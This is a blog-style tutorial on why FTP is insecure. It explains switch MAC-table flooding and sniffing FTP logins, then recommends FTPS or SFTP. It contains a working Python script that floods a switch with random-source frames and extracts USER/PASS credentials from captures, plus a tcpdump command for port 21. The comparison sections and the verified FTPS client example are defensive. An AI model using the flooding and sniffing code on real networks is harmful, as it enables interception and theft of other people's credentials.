May 28, 2010

Using Insecure Protocols – FTP

Considering how far security has evolved, it is surprising how many companies still depend on old technologies and protocols. FTP is one such protocol, and many people still assume it is secure because it requires a login. While a server can keep users out of areas they don't belong in, and logging activity improves the chances of detecting malicious commands, the protocol itself remains insecure: both the credentials and the file contents cross the network in the clear.

Sniffing for credentials

The easiest way to gain unwanted access to an FTP server is sniffing, and there are several ways to go about it. One is to fill the switch's MAC address table. A switch records the source MAC address of every frame together with the port it arrived on, and each new address takes a slot in that table. Once the table is full, the switch no longer knows which port a destination belongs to and falls back to sending the frame out every port, like a hub, so any machine on the segment can see the traffic. Not all switches are vulnerable to this: a managed switch with port security (a limit on the number of MAC addresses learned per port) will drop the excess addresses or shut the port instead.

In this case the MAC table of an unmanaged switch was filled. With only 8K of space for MAC addresses, it did not take long. This was done with a Python script that sent frames from random, imaginary source MAC addresses to random, imaginary destinations; the switch dutifully learned each bogus source and spent a slot on it.

To log in to an FTP site, a server address, username and password are needed. The FTP protocol sends them with the USER and PASS commands on the control channel (TCP port 21), in the clear, so a simple text search over the capture is all that is needed to find them. The capture tool used was tcpdump, which can be installed on many platforms, including a Wi-Fi equipped cell phone. In the capture between the two computers, the user's username and password appear in plain text.

With a simple Python script to flood the switch, tcpdump, and a text editor, a user's FTP login credentials have been captured. It is not all bad news: there are several alternatives to FTP, such as SFTP and FTPS.
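As an added worked example (this is not the author's script or capture), here are the two halves of the attack above in Python. The first builds the kind of random-source Ethernet frames that fill a switch's MAC table (the send function needs a Linux raw socket and CAP_NET_RAW, and is deliberately not run on import). The second does the "simple search" over captured FTP control-channel traffic, here over a constructed capture in which a client at 192.168.1.10 logs in to a server at 192.168.1.20 with the made-up account alice / s3cret!. The interface name, addresses, banner text and account are all assumptions.

```python
"""Added example, not the original post's script or capture: MAC-table flooding
frames plus a search for FTP USER/PASS in captured control-channel traffic.
Interface name, addresses and the alice / s3cret! account are constructed."""
import os
import re
import socket
import struct
from typing import Dict, List, Optional, Tuple

LOCAL_EXPERIMENTAL_ETHERTYPE = 0x88B5  # IEEE local experimental EtherType: harmless filler
IPV4_ETHERTYPE = 0x0800
FTP_CRED_RE = re.compile(rb"^(USER|PASS) (.*?)\r?$", re.MULTILINE)


def random_unicast_mac() -> bytes:
    """Random locally administered unicast MAC (I/G bit clear, U/L bit set)."""
    mac = bytearray(os.urandom(6))
    mac[0] = (mac[0] & 0xFE) | 0x02
    return bytes(mac)


def build_flood_frame(payload: bytes = b"\x00" * 46) -> bytes:
    """Ethernet II frame: random destination, random source, filler payload.

    The switch learns the bogus source MAC on the ingress port and spends a
    table slot on it; enough of these fill the table, after which frames for
    unknown destinations are flooded out every port."""
    return (random_unicast_mac() + random_unicast_mac()
            + struct.pack("!H", LOCAL_EXPERIMENTAL_ETHERTYPE) + payload)


def flood_switch(interface: str, count: int) -> int:
    """Send `count` flood frames on `interface` (Linux AF_PACKET; needs CAP_NET_RAW).
    Deliberately not called at import time."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as raw:
        raw.bind((interface, 0))
        for _ in range(count):
            raw.send(build_flood_frame())
    return count


def parse_ipv4_tcp(frame: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src_ip, dst_ip, sport, dport, tcp_payload) for an Ethernet/IPv4/TCP
    frame, or None for anything else (ARP, the flood frames above, non-TCP)."""
    if len(frame) < 14 + 20 + 20 or struct.unpack("!H", frame[12:14])[0] != IPV4_ETHERTYPE:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[0] >> 4 != 4 or ihl < 20 or ip[9] != 6 or len(ip) < ihl + 20:
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src_ip, dst_ip = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src_ip, dst_ip, sport, dport, tcp[data_off:]


def extract_ftp_credentials(frames: List[bytes], ftp_port: int = 21) -> Dict[Tuple[str, str], Dict[str, str]]:
    """Concatenate client-to-server control-channel payloads per (client, server)
    pair in capture order and pull out the USER and PASS lines. No TCP
    reassembly: fine for a login that fits in a few in-order segments."""
    streams: Dict[Tuple[str, str], bytearray] = {}
    for frame in frames:
        parsed = parse_ipv4_tcp(frame)
        if parsed is None:
            continue
        src_ip, dst_ip, _sport, dport, payload = parsed
        if dport == ftp_port and payload:
            streams.setdefault((src_ip, dst_ip), bytearray()).extend(payload)
    found: Dict[Tuple[str, str], Dict[str, str]] = {}
    for pair, data in streams.items():
        creds = {m.group(1).decode().lower(): m.group(2).decode(errors="replace")
                 for m in FTP_CRED_RE.finditer(bytes(data))}
        if creds:
            found[pair] = creds
    return found


def build_tcp_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame for the offline sample (checksums left zero)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", IPV4_ETHERTYPE)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


# Constructed capture: a client at 192.168.1.10 logs in to a server at 192.168.1.20.
SAMPLE_CAPTURE = [
    build_tcp_frame("192.168.1.20", "192.168.1.10", 21, 40001, b"220 FTP server ready\r\n"),
    build_tcp_frame("192.168.1.10", "192.168.1.20", 40001, 21, b"USER alice\r\n"),
    build_tcp_frame("192.168.1.20", "192.168.1.10", 21, 40001, b"331 Password required\r\n"),
    build_tcp_frame("192.168.1.10", "192.168.1.20", 40001, 21, b"PASS s3cret!\r\n"),
    build_tcp_frame("192.168.1.20", "192.168.1.10", 21, 40001, b"230 Login successful\r\n"),
    build_flood_frame(),  # a stray flood frame in the capture is simply skipped
]

if __name__ == "__main__":
    for (client, server), creds in extract_ftp_credentials(SAMPLE_CAPTURE).items():
        print(f"{client} -> {server}: USER {creds.get('user')!r} PASS {creds.get('pass')!r}")
```

On a live segment the equivalent capture is `tcpdump -A -i eth0 'tcp port 21'` (or `-w` to write a pcap whose frames can then be handed to extract_ftp_credentials). The extractor only concatenates client-to-server payloads in capture order; it does not reassemble TCP, which is enough for a login that arrives in a couple of in-order segments but not for a long, lossy session.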

SFTP vs. FTPS

FTPS

FTPS, or FTP over SSL/TLS (RFC 4217), is FTP with the control channel wrapped in TLS after the client issues AUTH TLS. The server presents an X.509 certificate, and the USER and PASS commands travel inside the encrypted channel, so a sniffer no longer sees them. The data channel is a separate connection, just as with plain FTP, and it is only encrypted if the client also requests it with PROT P; in the default PROT C state the file contents still cross the network in the clear. That second channel is also why FTPS can be harder to run through a firewall than SFTP: with the control channel encrypted, a firewall or NAT device can no longer read the PORT and PASV exchange to open the data connection dynamically. A further drawback is that FTPS has fewer free or open source server implementations than SFTP, although vsftpd and ProFTPD can both be configured for TLS.
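As an added example (not from the original post), here is what "used properly" means for an FTPS client, written against Python's standard ftplib: the server's certificate is verified against a CA, the credentials are sent only after AUTH TLS has encrypted the control channel, and PROT P is issued so the data channel is protected as well. The host name, account and CA file are placeholders.

```python
"""Added example, not the original post's code: an explicit FTPS (RFC 4217)
client session that protects both the control and the data channel.
Host, account and CA bundle below are placeholders."""
import ftplib
import ssl
from typing import Optional


def make_ftps_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """TLS context that verifies the server's X.509 certificate and host name.

    create_default_context() gives CERT_REQUIRED plus check_hostname; a context
    that disables either makes the session trivially man-in-the-middle-able."""
    ctx = ssl.create_default_context(cafile=cafile)   # cafile=None: system CA store
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def open_ftps(host: str, user: str, password: str, cafile: Optional[str] = None) -> ftplib.FTP_TLS:
    """AUTH TLS before USER/PASS, then PBSZ 0 + PROT P for the data channel."""
    ftps = ftplib.FTP_TLS(context=make_ftps_context(cafile))
    ftps.connect(host, 21, timeout=30)
    ftps.auth()                 # AUTH TLS: control channel encrypted from here on
    ftps.login(user, password)  # USER/PASS now travel inside TLS, not in the clear
    ftps.prot_p()               # PROT P: without this, listings and files go in the clear
    return ftps


if __name__ == "__main__":
    # Placeholder values; point these at a real server and a CA bundle you trust.
    session = open_ftps("ftps.example.org", "alice", "s3cret!", cafile=None)
    print(session.nlst())
    session.quit()
```

The two checks worth keeping in mind when reviewing any FTPS client: that certificate verification is actually on (many examples pass a context with verify_mode CERT_NONE), and that prot_p() is called before the first transfer, because the protocol's default leaves the data channel unencrypted even after a successful TLS login.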

SFTP

SFTP (the SSH File Transfer Protocol) is not FTP at all. It is a binary protocol that runs as a subsystem over an SSH connection, so it inherits SSH's encryption and authentication (password or public key). The SSH layers it rides on are standardized in RFC 4251 through RFC 4254; the SFTP protocol itself never progressed beyond an Internet-Draft, and the version that OpenSSH and most other clients implement is draft version 3. Every request is packed into a binary message and sent to the server over the single encrypted channel, which also means only one port (normally TCP 22) has to pass the firewall. Later draft versions extended SFTP beyond file upload and download to file-system operations such as file locking and symbolic link creation. The protection depends on the client checking the server's host key; a client that silently accepts any host key is open to a man-in-the-middle attack just as a certificate-ignoring FTPS client is.

The Answer

The answer depends on the goals and requirements. Either SFTP or FTPS, when used properly (host keys or certificates actually verified, and for FTPS the data channel protected as well as the control channel), can help you achieve PCI DSS compliance. For FTPS there are many commercial solutions such as JSCAPE Secure FTP Server. SFTP, on the other hand, comes pre-installed on many Linux distributions through the OpenSSH package.